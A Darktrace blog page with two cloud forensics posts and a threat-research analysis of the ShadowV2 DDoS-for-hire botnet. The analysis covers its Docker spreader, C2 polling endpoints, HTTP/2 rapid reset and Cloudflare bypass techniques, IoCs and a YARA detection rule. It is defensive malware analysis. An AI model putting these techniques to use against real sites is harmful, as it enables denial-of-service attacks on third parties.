Blog
/
Cloud
/
July 15, 2025

Forensics or Fauxrensics: Five Core Capabilities for Cloud Forensics and Incident Response

This blog covers the five core capabilities that security teams should consider when evaluating a cloud forensics and incident response solution.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Calum Hall
Technical Content Researcher
people working and walking in officeDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
15
Jul 2025

The speed and scale at which new cloud resources can be spun up has resulted in uncontrolled deployments, misconfigurations, and security risks. It has had security teams racing to secure their business’ rapid migration from traditional on-premises environments to the cloud.

While many organizations have successfully extended their prevention and detection capabilities to the cloud, they are now experiencing another major gap: forensics and incident response.

Once something bad has been identified, understanding its true scope and impact is nearly impossible at times. The proliferation of cloud resources across a multitude of cloud providers, and the addition of container and serverless capabilities all add to the complexities. It’s clear that organizations need a better way to manage cloud incident response.

Security teams are looking to move past their homegrown solutions and open-source tools to incorporate real cloud forensics capabilities. However, with the increased buzz around cloud forensics, it can be challenging to decipher what is real cloud forensics, and what is “fauxrensics.”

This blog covers the five core capabilities that security teams should consider when evaluating a cloud forensics and incident response solution.

[related-resource]

1. Depth of data

There have been many conversations among the security community about whether cloud forensics is just log analysis. The reality, however, is that cloud forensics necessitates access to a robust dataset that extends far beyond traditional log data sources.

While logs provide valuable insights, a forensics investigation demands a deeper understanding derived from multiple data sources, including disk, network, and memory, within the cloud infrastructure. Full disk analysis complements log analysis, offering crucial context for identifying the root cause and scope of an incident.

For instance, when investigating an incident involving a Kubernetes cluster running on an EC2 instance, access to bash history can provide insights into the commands executed by attackers on the affected instance, which would not be available through cloud logs alone.

Having all of the evidence in one place is also a capability that can significantly streamline investigations, unifying your evidence be it disk images, memory captures or cloud logs, into a single timeline allowing security teams to reconstruct an attacks origin, path and impact far more easily. Multi–cloud environments also require platforms that can support aggregating data from many providers and services into one place. Doing this enables more holistic investigations and reduces security blind spots.

There is also the importance of collecting data from ephemeral resources in modern cloud and containerized environments. Critical evidence can be lost in seconds as resources are constantly spinning up and down, so having the ability to capture this data before its gone can be a huge advantage to security teams, rather than having to figure out what happened after the affected service is long gone.

darktrace / cloud, cado, cloud logs, ost, and memory information. value of cloud combined analysis

2. Chain of custody

Chain of custody is extremely critical in the context of legal proceedings and is an essential component of forensics and incident response. However, chain of custody in the cloud can be extremely complex with the number of people who have access and the rise of multi-cloud environments.

In the cloud, maintaining a reliable chain of custody becomes even more complex than it already is, due to having to account for multiple access points, service providers and third parties. Having automated evidence tracking is a must. It means that all actions are logged, from collection to storage to access. Automation also minimizes the chance of human error, reducing the risk of mistakes or gaps in evidence handling, especially in high pressure fast moving investigations.

The ability to preserve unaltered copies of forensic evidence in a secure manner is required to ensure integrity throughout an investigation. It is not just a technical concern, its a legal one, ensuring that your evidence handling is documented and time stamped allows it to stand up to court or regulatory review.

Real cloud forensics platforms should autonomously handle chain of custody in the background, recording and safeguarding evidence without human intervention.

3. Automated collection and isolation

When malicious activity is detected, the speed at which security teams can determine root cause and scope is essential to reducing Mean Time to Response (MTTR).

Automated forensic data collection and system isolation ensures that evidence is collected and compromised resources are isolated at the first sign of malicious activity. This can often be before an attacker has had the change to move latterly or cover their tracks. This enables security teams to prevent potential damage and spread while a deeper-dive forensics investigation takes place. This method also ensures critical incident evidence residing in ephemeral environments is preserved in the event it is needed for an investigation. This evidence may only exist for minutes, leaving no time for a human analyst to capture it.

Cloud forensics and incident response platforms should offer the ability to natively integrate with incident detection and alerting systems and/or built-in product automation rules to trigger evidence capture and resource isolation.

4. Ease of use

Security teams shouldn’t require deep cloud or incident response knowledge to perform forensic investigations of cloud resources. They already have enough on their plates.

While traditional forensics tools and approaches have made investigation and response extremely tedious and complex, modern forensics platforms prioritize usability at their core, and leverage automation to drastically simplify the end-to-end incident response process, even when an incident spans multiple Cloud Service Providers (CSPs).

Useability is a core requirement for any modern forensics platform. Security teams should not need to have indepth knowledge of every system and resource in a given estate. Workflows, automation and guidance should make it possible for an analyst to investigate whatever resource they need to.

Unifying the workflow across multiple clouds can also save security teams a huge amount of time and resources. Investigations can often span multiple CSP’s. A good security platform should provide a single place to search, correlate and analyze evidence across all environments.

Offering features such as cross cloud support, data enrichment, a single timeline view, saved search, and faceted search can help advanced analysts achieve greater efficiency, and novice analysts are able to participate in more complex investigations.

5. Incident preparedness

Incident response shouldn't just be reactive. Modern security teams need to regularly test their ability to acquire new evidence, triage assets and respond to threats across both new and existing resources, ensuring readiness even in the rapidly changing environments of the cloud.  Having the ability to continuously assess your incident response and forensics workflows enables you to rapidly improve your processes and identify and mitigate any gaps identified that could prevent the organization from being able to effectively respond to potential threats.

Real forensics platforms deliver features that enable security teams to prepare extensively and understand their shortcomings before they are in the heat of an incident. For example, cloud forensics platforms can provide the ability to:

  • Run readiness checks and see readiness trends over time
  • Identify and mitigate issues that could prevent rapid investigation and response
  • Ensure the correct logging, management agents, and other cloud-native tools are appropriately configured and operational
  • Ensure that data gathered during an investigation can be decrypted
  • Verify that permissions are aligned with best practices and are capable of supporting incident response efforts

Cloud forensics with Darktrace

Darktrace delivers a proactive approach to cyber resilience in a single cybersecurity platform, including cloud coverage. Darktrace / CLOUD is a real time Cloud Detection and Response (CDR) solution built with advanced AI to make cloud security accessible to all security teams and SOCs. By using multiple machine learning techniques, Darktrace brings unprecedented visibility, threat detection, investigation, and incident response to hybrid and multi-cloud environments.

Darktrace’s cloud offerings have been bolstered with the acquisition of Cado Security Ltd., which enables security teams to gain immediate access to forensic-level data in multi-cloud, container, serverless, SaaS, and on-premises environments.

[related-resource]

Need help evaluating cloud security solutions?

Discover five essential capabilities for effective cloud forensics and incident response and how AI-based security solutions can make a difference.

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Calum Hall
Technical Content Researcher

More in this series

No items found.

Blog

/

Cloud

/

September 23, 2025

It’s Time to Rethink Cloud Investigations

cloud investigationsDefault blog imageDefault blog image

Cloud Breaches Are Surging

Cloud adoption has revolutionized how businesses operate, offering speed, scalability, and flexibility. But for security teams, this transformation has introduced a new set of challenges, especially when it comes to incident response (IR) and forensic investigations.

Cloud-related breaches are skyrocketing – 82% of breaches now involve cloud-stored data (IBM Cost of a Data Breach, 2023). Yet incidents often go unnoticed for days: according to a 2025 report by Cybersecurity Insiders, of the 65% of organizations experienced a cloud-related incident in the past year, only 9% detected it within the first hour, and 62% took more than 24 hours to remediate it (Cybersecurity Insiders, Cloud Security Report 2025).

Despite the shift to cloud, many investigation practices remain rooted in legacy on-prem approaches. According to a recent report, 65% of organizations spend approximately 3-5 days longer when investigating an incident in the cloud vs. on premises.

Cloud investigations must evolve, or risk falling behind attackers who are already exploiting the cloud’s speed and complexity.

4 Reasons Cloud Investigations Are Broken

The cloud’s dynamic nature – with its ephemeral workloads and distributed architecture – has outpaced traditional incident response methods. What worked in static, on-prem environments simply doesn’t translate.

Here’s why:

  1. Ephemeral workloads
    Containers and serverless functions can spin up and vanish in minutes. Attackers know this as well – they’re exploiting short-lived assets for “hit-and-run” attacks, leaving almost no forensic footprint. If you’re relying on scheduled scans or manual evidence collection, you’re already too late.
  2. Fragmented tooling
    Each cloud provider has its own logs, APIs, and investigation workflows. In addition, not all logs are enabled by default, cloud providers typically limit the scope of their logs (both in terms of what data they collect and how long they retain it), and some logs are only available through undocumented APIs. This creates siloed views of attacker activity, making it difficult to piece together a coherent timeline. Now layer in SaaS apps, Kubernetes clusters, and shadow IT — suddenly you’re stitching together 20+ tools just to find out what happened. Analysts call it the ‘swivel-chair Olympics,’ and it’s burning hours they don’t have.
  3. SOC overload
    Analysts spend the bulk of their time manually gathering evidence and correlating logs rather than responding to threats. This slows down investigations and increases burnout. SOC teams are drowning in noise; they receive thousands of alerts a day, the majority of which never get touched. False positives eat hundreds of hours a month, and consequently burnout is rife.  
  4. Cost of delay
    The longer an investigation takes, the higher its cost. Breaches contained in under 200 days save an average of over $1M compared to those that linger (IBM Cost of a Data Breach 2025).

These challenges create a dangerous gap for threat actors to exploit. By the time evidence is collected, attackers may have already accessed or exfiltrated data, or entrenched themselves deeper into your environment.

What’s Needed: A New Approach to Cloud Investigations

It’s time to ditch the manual, reactive grind and embrace investigations that are automated, proactive, and built for the world you actually defend. Here’s what the next generation of cloud forensics must deliver:

  • Automated evidence acquisition
    Capture forensic-level data the moment a threat is detected and before assets disappear.
  • Unified multi-cloud visibility
    Stitch together logs, timelines, and context across AWS, Azure, GCP, and hybrid environments into a single unified view of the investigation.
  • Accelerated investigation workflows
    Reduce time-to-insight from hours or days to minutes with automated analysis of forensic data, enabling faster containment and recovery.
  • Empowered SOC teams
    Fully contextualised data and collaboration workflows between teams in the SOC ensure seamless handover, freeing up analysts from manual collection tasks so they can focus on what matters: analysis and response.

Attackers are already leveraging the cloud’s agility. Defenders must do the same — adopting solutions that match the speed and scale of modern infrastructure.

Cloud Changed Everything. It’s Time to Change Investigations.  

The cloud fundamentally reshaped how businesses operate. It’s time for security teams to rethink how they investigate threats.

Forensics can no longer be slow, manual, and reactive. It must be instant, automated, and cloud-first — designed to meet the demands of ephemeral infrastructure and multi-cloud complexity.

The future of incident response isn’t just faster. It’s smarter, more scalable, and built for the environments we defend today, not those of ten years ago.  

On October 9th, Darktrace is revealing the next big thing in cloud security. Don’t miss it – sign up for the webinar.

darktrace live event launch
Continue reading
About the author
Kellie Regan
Director, Product Marketing - Cloud Security

Blog

/

Network

/

September 23, 2025

ShadowV2: An emerging DDoS for hire botnet

ShadowV2: An emerging DDoS for hire botnet Default blog imageDefault blog image

Introduction: ShadowV2 DDoS

Darktrace's latest investigation uncovered a novel campaign that blends traditional malware with modern devops technology.

At the center of this campaign is a Python-based command-and-control (C2) framework hosted on GitHub CodeSpaces. This campaign also utilizes a Python based spreader with a multi-stage Docker deployment as the initial access vector.

The campaign further makes use of a Go-based Remote Access Trojan (RAT) that implements a RESTful registration and polling mechanism, enabling command execution and communication with its operators.

ShadowV2 attack techniques

What sets this campaign apart is the sophistication of its attack toolkit.

The threat actors employ advanced methods such as HTTP/2 rapid reset, a Cloudflare under attack mode (UAM) bypass, and large-scale HTTP floods, demonstrating a capability to combine distributed denial-of-service (DDoS) techniques with targeted exploitation.

With the inclusion of an OpenAPI specification, implemented with FastAPI and Pydantic and a fully developed login panel and operator interface, the infrastructure seems to resemble a “DDoS-as-a-service” platform rather than a traditional botnet, showing the extent to which modern malware increasingly mirrors legitimate cloud-native applications in both design and usability.

Analysis of a SadowV2 attack

Initial access

The initial compromise originates from a Python script hosted on GitHub CodeSpaces. This can be inferred from the observed headers:

User-Agent: docker-sdk-python/7.1.0

X-Meta-Source-Client: github/codespaces

The user agent shows that the attacker is using the Python Docker SDK, a library for Python programs that allows them to interact with Docker to create containers. The X-Meta-Source-Client appears to have been injected by GitHub into the request to allow for attribution, although there is no documentation online about this header.

The IP the connections originate from is 23.97.62[.]139, which is a Microsoft IP based in Singapore. This aligns with expectations as GitHub is owned by Microsoft.

This campaign targets exposed Docker daemons, specifically those running on AWS EC2. Darktrace runs a number of honeypots across multiple cloud providers and has only observed attacks against honeypots running on AWS EC2. By default, Docker is not accessible to the Internet, however, can be configured to allow external access. This can be useful for managing complex deployments where remote access to the Docker API is needed.

Typically, most campaigns targeting Docker will either take an existing image from Docker Hub and deploy their tools within it, or upload their own pre-prepared image to deploy. This campaign works slightly differently; it first spawns a generic “setup” container and installs a number of tools within it. This container is then imaged and deployed as a live container with the malware arguments passed in via environmental variables.

Attacker creates a blank container from an Ubuntu image.
Figure 1: Attacker creates a blank container from an Ubuntu image.
Attacker sets up their tools for the attack.
Figure 2: Attacker sets up their tools for the attack.
 Attacker deploys a new container using the image from the setup container.
Figure 3: Attacker deploys a new container using the image from the setup container.

It is unclear why the attackers chose this approach - one possibility is that the actor is attempting to avoid inadvertently leaving forensic artifacts by performing the build on the victim machine, rather than building it themselves and uploading it.

Malware analysis

The Docker container acts as a wrapper around a single binary, dropped in /app/deployment. This is an ELF binary written in Go, a popular choice for modern malware. Helpfully, the binary is unstripped, making analysis significantly easier.

The current version of the malware has not been reported by OSINT providers such as VirusTotal. Using the domain name from the MASTER_ADDR variable and other IoCs, we were able to locate two older versions of the malware that were submitted to VirusTotal on the June 25 and July 30 respectively [1] [2].  Neither of these had any detections and were only submitted once each using the web portal from the US and Canada respectively. Darktrace first observed the attack against its honeypot on June 24, so it could be a victim of this campaign submitting the malware to VirusTotal. Due to the proximity of the start of the attacks, it could also be the attacker testing for detections, however it is not possible to know for certain.

The malware begins by phoning home, using the MASTER_ADDR and VPS_NAME identifiers passed in from the Docker run environmental variables. In addition, the malware derives a unique VPS_ID, which is the VPS_NAME concatenated with the current unix timestamp. The VPS_ID is used for all communications with the C2 server as the identifier for the specific implant. If the malware is restarted, or the victim is re-infected, the C2 server will inform the implant of its original VPS_ID to ensure continuity.

Snippet that performs the registration by sending a POST request to the C2 API with a JSON structure.
Figure 4: Snippet that performs the registration by sending a POST request to the C2 API with a JSON structure.

From there, the malware then spawns two main loops that will remain active for the lifetime of the implant. Every second, it sends a heartbeat to the C2 by sending the VPS_ID to hxxps://shadow.aurozacloud[.]xyz/api/vps/heartbeat via POST request. Every 5 seconds, it retrieves hxxps://shadow.aurozacloud[.]xyz/api/vps/poll/<VPS ID> via a GET request to poll for new commands.

The poll mechanism shadow v2
Figure 5: The poll mechanism.

At this stage, Darktrace security researchers wrote a custom client that ran on the server infected by the attacker that mimicked their implant. The goal was to intercept commands from the C2. Based on this, it was observed initiating an attack against chache08[.]werkecdn[.]me using a 120 thread HTTP2 rapid reset attack. This site appears to be hosted on an Amsterdam VPS provided by FDCServers, a server hosting company. It was not possible to identify what normally runs on this site, as it returns a 403 Forbidden error when visited.

Darktrace’s code analysis found that the returned commands contain the following fields:

  • Method (e.g. GET, POST)
  • A unique ID for the attack
  • A URL endpoint used to report attack statistics
  • The target URL & port
  • The duration of the attack
  • The number of threads to use
  • An optional proxy to send HTTP requests through

The malware then spins up several threads, each running a configurable number of HTTP clients using Valyala’s fasthttp library, an open source Go library for making high-performance HTTP requests. After this is complete, it uses these clients to perform an HTTP flood attack against the target.

A snippet showing the fasthttp client creation loop, as well as a function to report the worker count back to the C2.
Figure 6: A snippet showing the fasthttp client creation loop, as well as a function to report the worker count back to the C2.

In addition, it also features several flags to enable different bypass mechanisms to augment the malware:

  • WordPress bypass (does not appear to be implemented - the flag is not used anywhere)
  • Random query strings appended to the URL
  • Spoofed forwarding headers with random IP addresses
  • Cloudflare under-attack-mode (UAM) bypass
  • HTTP2 rapid reset

The most interesting of these is the Cloudflare UAM bypass mechanism. When this is enabled, the malware will attempt to use a bundled ChromeDP binary to solve the Cloudflare JavaScript challenge that is presented to new visitors. If this succeeds, the clearance cookie obtained is then included in subsequent requests. This is unlikely to work in most cases as headless Chrome browsers are often flagged, and a regular CAPTCHA is instead served.

The UAM bypass success snippet.
Figure 7: The UAM bypass success snippet.

Additionally, the malware has a flag to enable an HTTP2 rapid reset attack mode instead of a regular HTTP flood. In HTTP2, a client can create thousands of requests within a single connection using multiplexing, allowing sites to load faster. The number of request streams per connection is capped however, so in a rapid reset attack many requests are made and then immediately cancelled to allow more requests to be created. This allows a single client to execute vastly more requests per second and use more server resources than it otherwise would, allowing for more effective denial-of-service (DoS) attacks.

 The HTTP2 rapid reset snippet from the main attack function.
Figure 8: The HTTP2 rapid reset snippet from the main attack function.

API/C2 analysis

As mentioned throughout the malware analysis section, the malware communicates with a C2 server using HTTP. The server is behind Cloudflare, which obscures its hosting location and prevents analysis. However, based on analysis of the spreader, it's likely running on GitHub CodeSpaces.

When sending a malformed request to the API, an error generated by the Pydantic library is returned:

{"detail":[{"type":"missing","loc":["body","vps_id"],"msg":"Field required","input":{"vps_name":"xxxxx"},"url":"https://errors.pydantic.dev/2.11/v/missing"}]}

This shows they are using Python for the API, which is the same language that the spreader is written in.

One of the larger frameworks that ships with Pydantic is FastAPI, which also ships with Swagger. The malware author left this publicly exposed, and Darktrace’s researchers were able to obtain a copy of their API documentation. The author appears to have noticed this however, as subsequent attempts to access it now returns a HTTP 404 Not Found error.

Swagger UI view based on the obtained OpenAPI spec.
Figure 9: Swagger UI view based on the obtained OpenAPI spec.

This is useful to have as it shows all the API endpoints, including the exact fields they take and return, along with comments on each endpoint written by the attacker themselves.

It is very likely a DDoS for hire platform (or at the very least, designed for multi-tenant use) based on the extensive user API, which features authentication, distinctions between privilege level (admin vs user), and limitations on what types of attack a user can execute. The screenshot below shows the admin-only user create endpoint, with the default limits.

The admin-only user create endpoint shadow v2
Figure 10: The admin-only user create endpoint.

The endpoint used to launch attacks can also be seen, which lines up with the options previously seen in the malware itself. Interestingly, this endpoint requires a list of zombie systems to launch the attack from. This is unusual as most DDoS for hire services will decide this internally or just launch the attack from every infected host (zombie). No endpoints that returned a list of zombies were found, however, it’s possible one exists as the return types are not documented for all the API endpoints.

The attack start endpoint shadow v2
Figure 11: The attack start endpoint.

There is also an endpoint to manage a blacklist of hosts that cannot be attacked. This could be to stop users from launching attacks against sites operated by the malware author, however it’s also possible the author could be attempting to sell protection to victims, which has been seen previously with other DDoS for hire services.

Blacklist endpoints shadow v2 DDoS
Figure 12: Blacklist endpoints.

Attempting to visit shadow[.]aurozacloud[.]xyz results in a seizure notice. It is most likely fake the same backend is still in use and all of the API endpoints continue to work. Appending /login to the end of the path instead brings up the login screen for the DDoS platform. It describes itself as an “advanced attack platform”, which highlights that it is almost certainly a DDoS for hire service. The UI is high quality, written in Tailwind, and even features animations.

The fake seizure notice.
Figure 13: The fake seizure notice.
The login UI at /login.
Figure 14: The login UI at /login.

Conclusion

By leveraging containerization, an extensive API, and with a full user interface, this campaign shows the continued development of cybercrime-as-a-service. The ability to deliver modular functionality through a Go-based RAT and expose a structured API for operator interaction highlights how sophisticated some threat actors are.

For defenders, the implications are significant. Effective defense requires deep visibility into containerized environments, continuous monitoring of cloud workloads, and behavioral analytics capable of identifying anomalous API usage and container orchestration patterns. The presence of a DDoS-as-a-service panel with full user functionality further emphasizes the need for defenders to think of these campaigns not as isolated tools but as evolving platforms.

Appendices

References

1. https://www.virustotal.com/gui/file/1b552d19a3083572bc433714dfbc2b75eb6930a644696dedd600f9bd755042f6

2. https://www.virustotal.com/gui/file/1f70c78c018175a3e4fa2b3822f1a3bd48a3b923d1fbdeaa5446960ca8133e9c

IoCs

Malware hashes (SHA256)

●      2462467c89b4a62619d0b2957b21876dc4871db41b5d5fe230aa7ad107504c99

●      1b552d19a3083572bc433714dfbc2b75eb6930a644696dedd600f9bd755042f6

●      1f70c78c018175a3e4fa2b3822f1a3bd48a3b923d1fbdeaa5446960ca8133e9c

C2 domain

●      shadow.aurozacloud[.]xyz

Spreader IPs

●      23.97.62[.]139

●      23.97.62[.]136

Yara rule

rule ShadowV2 {

meta:

author = "nathaniel.bill@darktrace.com"

description = "Detects ShadowV2 botnet implant"

strings:

$string1 = "shadow-go"

$string2 = "shadow.aurozacloud.xyz"

$string3 = "[SHADOW-NODE]"

$symbol1 = "main.registerWithMaster"

$symbol2 = "main.handleStartAttack"

$symbol3 = "attacker.bypassUAM"

$symbol4 = "attacker.performHTTP2RapidReset"

$code1 = { 48 8B 05 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 38 01 00 00 48 89 84 24 40 01 00 00 48 8B 4C 24 40 48 BA 00 09 6E 88 F1 FF FF FF 48 8D 04 0A E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 48 01 00 00 48 89 84 24 50 01 00 00 48 8D 05 ?? ?? ?? ?? BB 05 00 00 00 48 8D 8C 24 38 01 00 00 BF 02 00 00 00 48 89 FE E8 ?? ?? ?? ?? }

$code2 = { 48 89 35 ?? ?? ?? ?? 0F B6 94 24 80 02 00 00 88 15 ?? ?? ?? ?? 0F B6 94 24 81 02 00 00 88 15 ?? ?? ?? ?? 0F B6 94 24 82 02 00 00 88 15 ?? ?? ?? ?? 0F B6 94 24 83 02 00 00 88 15 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? }

$code3 = { 48 8D 15 ?? ?? ?? ?? 48 89 94 24 68 04 00 00 48 C7 84 24 78 04 00 00 15 00 00 00 48 8D 15 ?? ?? ?? ?? 48 89 94 24 70 04 00 00 48 8D 15 ?? ?? ?? ?? 48 89 94 24 80 04 00 00 48 8D 35 ?? ?? ?? ?? 48 89 B4 24 88 04 00 00 90 }

condition:

uint16(0) == 0x457f and (2 of ($string*) or 2 of ($symbol*) or any of ($code*))

}

The content provided in this blog is published by Darktrace for general informational purposes only and reflects our understanding of cybersecurity topics, trends, incidents, and developments at the time of publication. While we strive to ensure accuracy and relevance, the information is provided “as is” without any representations or warranties, express or implied. Darktrace makes no guarantees regarding the completeness, accuracy, reliability, or timeliness of any information presented and expressly disclaims all warranties.

Nothing in this blog constitutes legal, technical, or professional advice, and readers should consult qualified professionals before acting on any information contained herein. Any references to third-party organizations, technologies, threat actors, or incidents are for informational purposes only and do not imply affiliation, endorsement, or recommendation.

Darktrace, its affiliates, employees, or agents shall not be held liable for any loss, damage, or harm arising from the use of or reliance on the information in this blog.

The cybersecurity landscape evolves rapidly, and blog content may become outdated or superseded. We reserve the right to update, modify, or remove any content without notice.

Continue reading
About the author
Nate Bill
Threat Researcher
Your data. Our AI.
Elevate your network security with Darktrace AI